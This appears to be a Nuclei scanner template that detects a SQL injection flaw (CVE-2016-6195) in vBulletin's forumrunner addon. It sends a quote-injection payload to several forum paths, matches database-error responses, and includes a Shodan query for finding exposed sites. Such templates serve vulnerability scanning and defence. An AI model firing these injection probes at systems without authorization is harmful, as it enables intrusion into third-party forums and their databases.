id: CVE-2016-6195

info:
  name: vBulletin <= 4.2.3 - SQL Injection
  author: MaStErChO
  severity: critical
  description: |
    vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
  remediation: |
    Upgrade to a patched version of vBulletin (4.2.4 or later) or apply the official patch provided by the vendor.
  reference:
    - https://www.cvedetails.com/cve/CVE-2016-6195/
    - https://www.exploit-db.com/exploits/38489
    - https://enumerated.wordpress.com/2016/07/11/1/
    - http://www.vbulletin.org/forum/showthread.php?t=322848
    - https://github.com/drewlong/vbully
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-6195
    cwe-id: CWE-89
    epss-score: 0.00284
    epss-percentile: 0.65416
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 6
    vendor: vbulletin
    product: vbulletin
    shodan-query: title:"Powered By vBulletin"
  tags: cve2016,cve,vbulletin,sqli,forum,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "type=dberror"

      - type: status
        status:
          - 200
          - 503
        condition: or
# digest: 4a0a0047304502201d3f5505147a2436c4abe3f1c341fe209327797eb297587bf15a68c5321be2fc0221009002c5c228d53f60792cc0d97f32e82d17c7d571d4d3dfb92f8ec731df341e55:922c64590222798bb761d5b6d8e72950